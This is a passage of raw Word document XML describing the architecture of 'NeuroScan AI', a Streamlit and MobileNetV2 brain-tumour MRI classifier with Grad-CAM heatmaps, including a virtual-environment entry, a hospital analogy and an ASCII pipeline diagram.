          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for portfolio presentation and professional open-source standards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Visitors see a bare directory of code without context or instructions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manually written and structured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>11. `.venv/`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The self-contained Python 3.11 virtual environment holding the isolated Python executable, standard library copies, and installed site-packages (TensorFlow, Streamlit, OpenCV, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prevents package version conflicts with the user's global system Python.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executes Python code using pinned project dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used whenever running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>streamlit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Essential locally; never committed to Git (recreated via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Code executes in system Python where packages may be missing or version-incompatible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Created via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python -m venv .venv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</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3: Project Architecture &amp; Component Relationships</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.1 High-Level Real-World Analogy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of NeuroScan AI like a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Modern Specialized Hospital Eye-and-Brain Clinic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The Reception Desk (Streamlit Frontend):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A patient walks in carrying an MRI envelope. The receptionist receives the scan, verifies that it is a valid picture, and places it on a standardized digital tray.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The Medical Records Archive (Model Caching):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Instead of hiring and training a brand-new doctor every time a patient walks in, the clinic has its Chief Specialist permanently on-site in the consultation room. The specialist's brain is already loaded with medical knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The Physician's Assistant (Preprocessing Engine):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before the doctor looks at the scan, the assistant resizes the film to exactly $224 </w:t>
        <w:tab/>
        <w:t>imes 224$ centimeters and adjusts the lighting scale from $[0, 255]$ to $[-1, 1]$ so the specialist's eyes can interpret it instantly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The Chief Specialist (MobileNetV2 Neural Network):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The specialist examines the scan. The visual cortex (the convolutional base) extracts shapes, edges, and tissue densities. The diagnostic brain center (the classification head) weighs the evidence and issues a probability assessment: *"95% probability of Meningioma"*.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The Transparent Highlighter Projection (Grad-CAM Engine):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>To prove they didn't just guess, the doctor clicks a switch that shines an infrared thermal lamp onto the scan film. The lamp glows bright red directly over the abnormal tumor mass, showing the patient and family the exact physical reason for the diagnosis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The Diagnostic Display Monitor (UI Dashboard):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The patient receives a clear, color-coded report showing the highlighted scan, the diagnosis, and the probability breakdown.</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3.2 Technical Architecture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w:t>
              <w:br/>
              <w:t>|                              USER INTERACTION LAYER                                |</w:t>
              <w:br/>
              <w:t>|                                                                                   |</w:t>
              <w:br/>
              <w:t>|   +--------------------------+                     +--------------------------+   |</w:t>
              <w:br/>
              <w:t>|   | 📁 Upload Custom MRI      |                     | 🔬 Select Test Sample    |   |</w:t>
              <w:br/>
              <w:t>|   |    (JPG, JPEG, PNG)      |                     |    (From dataset/Testing)|   |</w:t>
              <w:br/>
              <w:t>|   +-------------+------------+                     +-------------+------------+   |</w:t>
              <w:br/>
              <w:t>+-----------------|------------------------------------------------|----------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">                  |                                                |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                  +-----------------------+------------------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          v</w:t>
              <w:br/>
              <w:t>+-----------------------------------------------------------------------------------+</w:t>
              <w:br/>
              <w:t>|                        FRONTEND PRESENTATION LAYER (app.py)                        |</w:t>
              <w:br/>
              <w:t>|                                                                                   |</w:t>
              <w:br/>
              <w:t>|   • Streamlit Reactive UI Engine                                                  |</w:t>
              <w:br/>
              <w:t>|   • Dark-Mode Glassmorphism CSS Styling                                           |</w:t>
              <w:br/>
              <w:t>|   • Layout Orchestration: Header -&gt; Status Banner -&gt; Dual Diagnostic Columns       |</w:t>
              <w:br/>
              <w:t>+-----------------------------------------|-----------------------------------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          v</w:t>
              <w:br/>
              <w:t>+-----------------------------------------------------------------------------------+</w:t>
              <w:br/>
              <w:t>|                     IN-MEMORY MODEL CACHING &amp; INITIALIZATION                      |</w:t>
              <w:br/>
              <w:t>|                                                                                   |</w:t>
              <w:br/>
              <w:t>|   @st.cache_resource(show_spinner=False)                                          |</w:t>
              <w:br/>
              <w:t>|   def load_neuroscan_model():                                                     |</w:t>
              <w:br/>
              <w:t>|       model = tf.keras.models.load_model(FULL_SCRATCH_PATH)                       |</w:t>
              <w:br/>
              <w:t>|       base_model = model.get_layer("mobilenetv2_1.00_224")                        |</w:t>
              <w:br/>
              <w:t>|       return model, base_model                                                    |</w:t>
              <w:br/>
              <w:t>+-----------------------------------------|-----------------------------------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          v</w:t>
              <w:br/>
              <w:t>+-----------------------------------------------------------------------------------+</w:t>
              <w:br/>
              <w:t>|                         IMAGE PREPROCESSING PIPELINE                              |</w:t>
              <w:br/>
              <w:t>|                                                                                   |</w:t>
              <w:br/>
              <w:t>|   Input: Raw Image (PIL.Image or File Stream)                                     |</w:t>
              <w:br/>
              <w:t>|   Step 1: Convert to 3-Channel RGB (img.convert('RGB'))                           |</w:t>
              <w:br/>
              <w:t>|   Step 2: Bilinear Interpolation Resize to (224, 224) via OpenCV                  |</w:t>
              <w:br/>
              <w:t>|   Step 3: Expand Batch Dimension -&gt; Tensor Shape: (1, 224, 224, 3) (float32)      |</w:t>
              <w:br/>
              <w:t>|   Step 4: Scale Pixels to [-1, 1] via tf.keras.applications.mobilenet_v2          |</w:t>
              <w:br/>
              <w:t>+-----------------------------------------|-----------------------------------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                   +----------------------+----------------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">                   |                                             |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                   v                                             v</w:t>
              <w:br/>
              <w:t>+------------------------------------+       +------------------------------------+</w:t>
              <w:br/>
              <w:t>|     PRIMARY INFERENCE PATHWAY      |       |      GRAD-CAM SALIENCY ENGINE      |</w:t>
              <w:br/>
              <w:t>|                                    |       |                                    |</w:t>
              <w:br/>
              <w:t>| • Feed tensor to Functional Model  |       | • Track tensor in tf.GradientTape  |</w:t>
              <w:br/>
              <w:t>| • Forward pass through Base Model  |       | • Extract feature maps from        |</w:t>
              <w:br/>
              <w:t>| • GlobalAveragePooling2D           |       |   layer: base_model.output         |</w:t>
              <w:br/>
              <w:t>| • Dense(128) Head + Regularization |       |   Shape: (1, 7, 7, 1280)           |</w:t>
              <w:br/>
              <w:t>| • Dense(4, Softmax) Output         |       | • Forward pass through Head        |</w:t>
              <w:br/>
              <w:t>|                                    |       | • Compute gradient:                |</w:t>
              <w:br/>
              <w:t>| Result: Vector of 4 Probabilities  |       |   d(class_score) / d(conv_features)|</w:t>
              <w:br/>
              <w:t>|   probs: [P_glio, P_men, P_no, P_pit]|     | • Global Average Pool Gradients    |</w:t>
              <w:br/>
              <w:t>|   pred_idx = argmax(probs)         |       | • Linear Combination of Channels   |</w:t>
              <w:br/>
              <w:t>|   confidence = probs[pred_idx] * 100|      | • Apply ReLU &amp; Min-Max Normalize   |</w:t>
              <w:br/>
              <w:t>|                                    |       | • Resize 7x7 -&gt; 224x224 Heatmap    |</w:t>
              <w:br/>
              <w:t>|                                    |       | • cv2.applyColorMap(COLORMAP_JET)  |</w:t>
              <w:br/>
              <w:t>|                                    |       | • AddWeighted Overlay (alpha=0.45) |</w:t>
              <w:br/>
              <w:t>+------------------------------------+       +------------------------------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">                   |                                             |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                   +----------------------+----------------------+</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          |</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                          v</w:t>
              <w:br/>
              <w:t>+-----------------------------------------------------------------------------------+</w:t>
              <w:br/>
              <w:t>|                        COMPOSITED DIAGNOSTIC RENDERING                            |</w:t>
              <w:br/>
              <w:t>|                                                                                   |</w:t>
              <w:br/>
              <w:t>|   Left Column:                                 Right Column:                      |</w:t>
              <w:br/>
              <w:t>|   [ 🔬 Visual Saliency Studio ]                [ 📊 Probability Distribution ]     |</w:t>
              <w:br/>
              <w:t>|   • Tab 1: Superimposed Overlay (Scan + CAM)   • Sorted Color-Coded Progress Bars |</w:t>
              <w:br/>
              <w:t>|   • Tab 2: Pure Jet Activation Heatmap         • Ground-Truth Match Indicator     |</w:t>
              <w:br/>
              <w:t>|   • Tab 3: Side-by-Side Verification           • Diagnostic Confidence % Badge    |</w:t>
              <w:br/>
              <w:t>+-----------------------------------------------------------------------------------+</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3.3 Component Responsibilities &amp; Communication Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. Presentation Layer (`app.py`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Receives:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> User clicks, uploaded image file streams, or selected dropdown values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Does:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Orchestrates the visual hierarchy. Checks if an image is loaded, converts byte streams into NumPy arrays, triggers the preprocessing and inference routines, and creates two responsive columns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Returns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rendered HTML/CSS components and visual image elements to the browser DOM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. Model Caching Subsystem (`load_neuroscan_model`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Receives:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Filepath constants pointing to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>models/brain_tumor_mobilenetv2_full_scratch.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Does:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Invokes TensorFlow's model deserializer once on initial load. Decorates the loader with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@st.cache_resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, instructing Streamlit to store the resulting Python object in global application memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Returns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A tuple of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(model, base_model)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that persists across user sessions without reloading.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. Preprocessing Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Receives:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> An arbitrary input image (which could be $512 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes 512$ grayscale, RGBA, or $180 </w:t>
        <w:tab/>
        <w:t>imes 180$).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Does:</w:t>
      </w:r>
